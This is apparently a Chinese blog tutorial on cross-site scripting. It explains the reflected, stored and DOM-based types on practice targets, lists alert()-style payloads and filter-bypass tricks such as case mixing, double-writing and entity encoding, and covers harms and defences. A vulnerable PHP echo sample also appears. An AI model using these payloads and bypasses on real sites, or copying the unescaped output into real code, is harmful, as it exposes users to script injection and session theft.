网络安全-跨站脚本攻击(XSS)的原理、攻击及防御

以你之姓@ 2023-02-22 15:54 36阅读 0赞

**目录**

简介

所用工具

XSS的类型

反射型XSS/不持久型XSS

存储型XSS/持久型XSS

基于DOM的XSS

常用Payload与工具

XSS扫描工具

Payloads

script标签类

结合js的html标签

伪协议

绕过

危害

防御

--------------------

# 简介 #

**跨站脚本攻击**(全称Cross Site Scripting,为和CSS（层叠样式表）区分，简称为**XSS**)是指恶意攻击者在Web页面中**插入恶意javascript代码（也可能包含html代码）**，当用户浏览网页之时，嵌入其中Web里面的javascript代码会被执行，从而达到恶意攻击用户的目的。XSS是攻击客户端，最终受害者是用户，当然，网站管理员也是用户之一。  
XSS漏洞通常是通过php的输出函数将javascript代码输出到html页面中，通过用户本地浏览器执行的，所以xss漏洞关键就是**寻找参数未过滤的输出函数**。

php中常见的输出函数有：

*  `echo`
 *  `printf`
 *  `print`
 *  `print_r`
 *  `sprintf`
 *  `die`
 *  `var-dump`
 *  `var_export`

# 所用工具 #

Google出品：开源Web App漏洞测试环境：[Firing Range][]

靶机:[dvwa、][dvwa][pikachu][]

# XSS的类型 #

## 反射型XSS/不持久型XSS ##

选择的是echo函数，不加过滤，直接输出

input.php

<?php 
    $input = $_GET['input'];
    echo 'output:<br>'.$input;
    ?>

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70][] 显示

可以看到我们的输入直接被输出。 那么，如果我们的参数是JavaScript代码呢？

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1][] js代码执行

也就是说js能够做到的事情，都可在这里插入去实现，比如跳转到钓鱼网站。

Firing Range的[Html Body存在的反射型XSS][Html Body_XSS]

![20200704172108535.PNG][] 反射性XSS攻击之html Body

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2][] 脚本插入

下面是在dvwa中的展示

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3][] 插入js代码

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4][] 提交

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5][] 查看网页源代码

## 存储型XSS/持久型XSS ##

和反射型XSS的即时响应相比，存储型XSS则需要先把代码保存到数据库或文件中，**下次读取时仍然会显示出来**，利用的问题依然是**没有对用户的输入进行过滤**。使用靶机pikachu的存储型xss。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6][] XSS注入

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7][] 注入成功

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8][] 注入后留言列表

## 基于DOM的XSS ##

基于文档对象模型(Document Object Model，DOM)的一种漏洞。客户端的脚本可以通过DOM动态地修改页面内容，它不依赖于提交数据到服务器，而是从客户端获得DOM中的数据在本地执行，如果DOM中的数据没有经过严格确认，就会产生DOM型XSS漏洞。

没了解过DOM的可以看一看[HTML DOM教程][HTML DOM]

HTML DOM就像数据结构中的树，有根节点，叶子节点等，通过document对象进行写入。

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9][] F12查看源代码

使用F12查看，发现是把id为text的输入框的内容显示出来。单引号闭合即可，而且F12的时候就直接看见了。

提示给的是

'onclick="alert('lady_killer9')">

我使用的是

'onclick='alert('lady_killer9')

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10][] 注入成功

# 常用Payload与工具 #

## XSS扫描工具 ##

*  [XSStrike][]
 *  [beef][]
 *  [XSS Scanner Online][]
 *  [XSSer][]
 *  [xsscrapy][]
 *  [BruteXSS Terminal][]
 *  [BruteXSS GUI][]

工具不在于多，学一个就可以了，我学习的是第一个[网络安全-XSStrike中文手册（自学笔记）][-XSStrike]。

## Payloads ##

### script标签类 ###

对于没有过滤的很简单的XSS漏洞，可以使用

> <script>alert(“XSS”)</script>

有的时候会过滤掉script，大小写、双写等无法绕过，可使用后面的payload。

### 结合js的html标签 ###

可结合一些onclick、onerror等事件

> <IMG οnmοuseοver="alert('xxs')">
> 
> <img src=xss οnerrοr=alert(1)>

### 伪协议 ###

上面的都不行的话，可以试试伪协议

> <IFRAME SRC="javascript:alert(1);"></IFRAME>
> 
> <IMG DYNSRC="javascript:javascript:alert(1)">

# 绕过 #

**大小写绕过**

> <scRipt>alert(“XSS”)</scRipt>

**双写绕过**

> <scrscriptipt>alert(“XSS”)</scrscriptipt>

**html编码绕过**

> <script>alert(“XSS”)</script>

等价于

>  <script>alert("XSS")</script>

> <a href=javascript&colon;alert&lpar;2&rpar;>a</a>

等价于

> <a href=javascript:alert(2)>a</a>

如果你还不了解常见编码，可查看：[网络安全-WEB中的常见编码 ][-WEB_]

**标签优先级绕过**

> <noscript><img src="asdasd</noscript><img src=\* οnerrοr=prompt(1)>"></noscript>

# 危害 #

1.  用户的Cookie被获取，其中可能存在Session ID等敏感信息。若服务器端没有做相应防护，攻击者可用对应Cookie登陆服务器。
2.  攻击者能够在一定限度内记录用户的键盘输入。
3.  攻击者通过CSRF等方式以用户身份执行危险操作。
4.  XSS蠕虫。
5.  获取用户浏览器信息。
6.  利用XSS漏洞扫描用户内网。

# 防御 #

*  标签过滤
 *  事件过滤
 *  敏感字符过滤
 *  设置httponly防止Cookie被获取
 *  内容安全策略（CSP）
 *  在将不可信数据插入到HTML标签之间时，对这些数据进行HTML Entity编码
 *  **在将不可信数据插入到HTML属性里时，对这些数据进行HTML属性编码**
 *  **在将不可信数据插入到SCRIPT里时，对这些数据进行SCRIPT编码**
 *  **在将不可信数据插入到Style属性里时，对这些数据进行CSS编码**

当然，如果过过滤不全，或者CSP配置错误，也可能被绕过。

\------------------------------------20210821补充--------------------------------------

[知乎-如何通过XSS获取http-only保护的Cookie][-_XSS_http-only_Cookie]

在线XSS挑战：[http://test.ctf8.com/][http_test.ctf8.com]

XSS Challenges：[XSS Challenges][]

XSS Payload：[https://github.com/payloadbox/xss-payload-list][https_github.com_payloadbox_xss-payload-list]

OWASP XSS过滤备忘单：[https://owasp.org/www-community/xss-filter-evasion-cheatsheet][https_owasp.org_www-community_xss-filter-evasion-cheatsheet]

相对路径引入js进行XSS攻击：[RPO攻击技术][RPO]

[防御XSS的七条准则][XSS]

更多内容查看：[网络安全-自学笔记][-]

喜欢本文的请动动小手点个赞，收藏一下，有问题请下方评论，转载请注明出处，并附有原文链接，谢谢！如有侵权，请及时联系。如果您感觉有所收获，自愿打赏，可选择支付宝18833895206（小于），您的支持是我不断更新的动力。

[Firing Range]: http://public-firing-range.appspot.com/
[dvwa]: http://www.dvwa.co.uk/
[pikachu]: https://github.com/zhuifengshaonianhanlu/pikachu
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20200704164355132.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20200704164659765.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[Html Body_XSS]: http://public-firing-range.appspot.com/reflected/parameter/body?q=a
[20200704172108535.PNG]: https://img-blog.csdnimg.cn/20200704172108535.PNG
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 2]: https://img-blog.csdnimg.cn/20200704172118919.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 3]: https://img-blog.csdnimg.cn/20200705183115533.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 4]: https://img-blog.csdnimg.cn/20200705183332717.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 5]: https://img-blog.csdnimg.cn/20200705183344129.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 6]: https://img-blog.csdnimg.cn/20200801093846330.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 7]: https://img-blog.csdnimg.cn/20200801094012422.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 8]: https://img-blog.csdnimg.cn/20200801094030408.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[HTML DOM]: https://www.w3school.com.cn/htmldom/index.asp
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 9]: https://img-blog.csdnimg.cn/20200801101630564.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ_size_16_color_FFFFFF_t_70 10]: https://img-blog.csdnimg.cn/2020080110164184.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2xhZHlfa2lsbGVyOQ==,size_16,color_FFFFFF,t_70
[XSStrike]: https://github.com/UltimateHackers/XSStrike
[beef]: https://github.com/beefproject/beef
[XSS Scanner Online]: http://xss-scanner.com/
[XSSer]: https://tools.kali.org/web-applications/xsser
[xsscrapy]: https://github.com/DanMcInerney/xsscrapy
[BruteXSS Terminal]: https://github.com/shawarkhanethicalhacker/BruteXSS
[BruteXSS GUI]: https://github.com/rajeshmajumdar/BruteXSS
[-XSStrike]: https://blog.csdn.net/lady_killer9/article/details/109105084
[-WEB_]: https://blog.csdn.net/lady_killer9/article/details/112167885
[-_XSS_http-only_Cookie]: https://www.zhihu.com/question/22638210
[http_test.ctf8.com]: http://test.ctf8.com/
[XSS Challenges]: http://xss-quiz.int21h.jp/
[https_github.com_payloadbox_xss-payload-list]: https://github.com/payloadbox/xss-payload-list
[https_owasp.org_www-community_xss-filter-evasion-cheatsheet]: https://owasp.org/www-community/xss-filter-evasion-cheatsheet
[RPO]: http://blog.nsfocus.net/rpo-attack/
[XSS]: https://sking7.github.io/articles/430468050.html
[-]: https://blog.csdn.net/lady_killer9/article/details/106791542